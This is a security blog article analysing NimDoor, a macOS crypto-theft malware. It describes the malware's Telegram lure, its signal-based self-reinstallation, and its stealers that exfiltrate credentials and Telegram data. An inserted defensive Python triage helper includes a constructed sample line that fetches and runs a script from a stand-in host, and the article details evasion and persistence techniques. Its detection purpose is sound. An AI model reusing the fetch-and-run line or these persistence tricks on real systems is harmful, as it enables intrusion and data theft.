NimDoor Crypto-Theft: Mac Malware That Survives Removal

Written by Alexander Chapellin | Jul 4, 2025 7:47:11 PM

A group of hackers backed by the North Korean government is using a new type of malware for macOS called NimDoor. Its main target: companies and projects related to Web3 and cryptocurrencies.

According to researchers who analyzed this malware, the attackers are using some pretty unusual and never-before-seen techniques, including a system to stay active on the computer even after it's been deleted.

The attack starts very subtly: the hackers contact the victims via Telegram, posing as someone trustworthy. They then convince them to install a supposed “update” to the Zoom SDK. This fake update is sent via Calendly or even by email, making it appear legitimate. This entire method is quite reminiscent of a previous campaign attributed to the North Korean group BlueNoroff, known for using similar tactics.

Advanced malware that attacks Mac: how NimDoor works

A recent report revealed details about this rather sophisticated malware for macOS. Interestingly, the attackers behind this threat used binaries written in C++ and Nim; Nim is a programming language rarely seen in this type of attack, which in itself makes the toolkit unusual.

One of these files, called “installer,” takes the first step in the infection: it prepares the environment, creates the necessary folders, and sets up the paths where other malicious components will be installed. As part of that process, it drops two more files onto the system: “GoogIe LLC” (yes, with a capital “i” in place of the “l”, to resemble “Google”) and “CoreKitAgent.”

The first, GoogIe LLC, is tasked with collecting information about the infected system's environment and generating a configuration file that is encoded in hexadecimal (meaning it is not easy to read at a glance). That file is saved in a temporary folder and used to keep the malware active every time the computer starts up. It does this by installing a macOS LaunchAgent that runs automatically with each login, which also allows it to save authentication keys for future actions.

But the most advanced and dangerous component is CoreKitAgent, which is basically the “brain” of the malware. It is designed to react to system events in real time, using a native macOS kernel event mechanism called kqueue, which allows it to execute tasks asynchronously, without interrupting the normal operation of the computer.

This module implements a kind of state machine, with 10 possible “scenarios” that are activated depending on what the system is doing. This structure gives it a lot of flexibility and control to decide how to act in different situations.

And the most disturbing thing? NimDoor has a rather original persistence system. It installs custom signal handlers that react to signals such as SIGINT (interruption) or SIGTERM (termination). In other words, if you try to close or kill the process, the malware can detect it and act to stay alive in the system.

[Figure: Registering custom signal handlers for SIGINT and SIGTERM]

CoreKitAgent: The component that reinstalls itself if you try to remove it

These signals are normally used to shut down processes in the system, but in the case of NimDoor, something very different happens. When CoreKitAgent detects one of these signals, instead of shutting down, it activates a self-defense mechanism that reinstalls everything: it restores GoogIe LLC (the component that maintains access to the system) and reactivates the persistence chain to ensure that the malware remains active.

According to SentinelLABS, when this happens, CoreKitAgent captures the signal, rewrites the LaunchAgent file (which allows the malware to run at login), leaves a new copy of GoogIe LLC as a loader, and another of itself as a Trojan. It then gives them execution permissions using a specific function (addExecutionPermissions_user95startup95mainZutils_u32), which basically allows them to run again without any problems.

This behavior makes killing the malware process useless, as every time you try, it reinstalls itself in the background. In short: it is very difficult to remove with basic methods, and it is designed precisely to resist the most common defense attempts.

[Figure: Rewriting the malware components to disk when the process ends]

This is how NimDoor steals your data and communicates with attackers

CoreKitAgent runs an AppleScript that has been hex-encoded (i.e., disguised so that it is not noticeable at first glance). This script runs every 30 seconds, connects to the attacker's servers, and begins stealing information from the system, as well as allowing remote control of the computer through the osascript command. In other words, it acts as a very lightweight but effective backdoor.

Meanwhile, another malicious file called zoom_sdk_support.scpt launches a second phase of the attack. This file launches a component called trojan1_arm64, which connects to the attackers via encrypted communication using WSS (WebSocket Secure). Once the connection is active, it downloads two additional scripts called upl and tlgrm, whose sole purpose is to steal more data from the system.

Something curious (and worrying): the zoom_sdk_support.scpt file comes with more than 10,000 blank lines. This is not a mistake, but a technique used to hide the malicious code and make it go unnoticed in automatic analyses.
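As an added illustration (not code from the article or from SentinelLABS), the following Python triage helper checks a LaunchAgent plist and a script file for the indicators described above: a look-alike label, an osascript invocation carrying a hex-encoded payload, and blank-line padding. The plist, the label, the payload and the script are constructed samples, not real NimDoor indicators.

```python
import re
import plistlib

# Constructed sample LaunchAgent, modelled on the behaviour the article describes
# (hex-encoded osascript payload, look-alike label). Not a real NimDoor IoC.
PAYLOAD_HEX = 'do shell script "id"'.encode().hex()
SAMPLE_PLIST = f"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.GoogIe.LLC.agent</string>
<key>ProgramArguments</key><array>
<string>/usr/bin/osascript</string><string>-e</string><string>{PAYLOAD_HEX}</string>
</array>
<key>RunAtLoad</key><true/>
</dict></plist>""".encode()

# Constructed script padded with blank lines, as described for zoom_sdk_support.scpt.
SAMPLE_SCRIPT = "\n" * 10_000 + 'do shell script "curl -s http://example.invalid/upl | sh"\n'

# A run of at least 16 hex-encoded bytes, not embedded in a longer hex string.
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])(?:[0-9a-fA-F]{2}){16,}(?![0-9a-fA-F])")


def decode_hex_blobs(text: str) -> list[str]:
    """Return every hex run in text that decodes to printable ASCII."""
    out = []
    for m in HEX_RUN.finditer(text):
        raw = bytes.fromhex(m.group(0))
        if all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            out.append(raw.decode("ascii"))
    return out


def max_blank_run(text: str) -> int:
    """Longest run of consecutive empty lines (padding used to evade scanners)."""
    best = cur = 0
    for line in text.split("\n"):
        cur = cur + 1 if line.strip() == "" else 0
        best = max(best, cur)
    return best


def looks_like_homoglyph(name: str) -> bool:
    """Heuristic: an uppercase 'I' or a digit 0/1 between lowercase letters (GoogIe)."""
    return re.search(r"[a-z][I01][a-z]", name) is not None


def triage_launch_agent(plist_bytes: bytes) -> dict:
    """Summarise, for one LaunchAgent plist, the indicators the article describes."""
    p = plistlib.loads(plist_bytes)
    args = p.get("ProgramArguments", [])
    label = p.get("Label", "")
    return {
        "label": label,
        "homoglyph_label": looks_like_homoglyph(label),
        "uses_osascript": any(a.endswith("osascript") for a in args),
        "decoded_hex": [s for a in args for s in decode_hex_blobs(a)],
        "run_at_load": bool(p.get("RunAtLoad", False)),
    }
```

Because SIGINT and SIGTERM can be caught, findings like these are meant to guide removal of the LaunchAgent and dropped files before the process itself is terminated.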

Now, let's explain what these two scripts do:

  1. upl extracts sensitive data from the browser (such as cookies and saved passwords), as well as the contents of the macOS Keychain (where many system credentials are stored) and terminal command histories (.bash_history and .zsh_history). All this information is sent to a remote server using curl, specifically to the domain dataupload[.]tienda.

  2. tlgrm, on the other hand, focuses on stealing the local Telegram database, including a file called .tempkeyEncrypted, which probably contains encrypted keys. Attackers could use this data to read private messages that the victim has exchanged on Telegram.

[Figure: Telegram script targeting Telegram data]

Conclusion

Overall, NimDoor and the other backdoors analyzed are among the most complex threats targeting macOS that have been linked to North Korean hacking groups.

What makes this malware particularly dangerous is its modular structure, which gives it a great deal of flexibility to adapt to different situations, as well as its use of fairly novel techniques, such as persistence mechanisms based on system signals. All of this suggests that these attackers are rapidly evolving their tools, making them increasingly sophisticated and capable of operating on multiple operating systems.

Malicious domains, file paths, scripts, and specific binaries used in these campaigns have also been identified, which are clearly designed to steal cryptocurrencies and sensitive information from victims. These technical details are key for security experts to detect and stop new infections before they cause damage.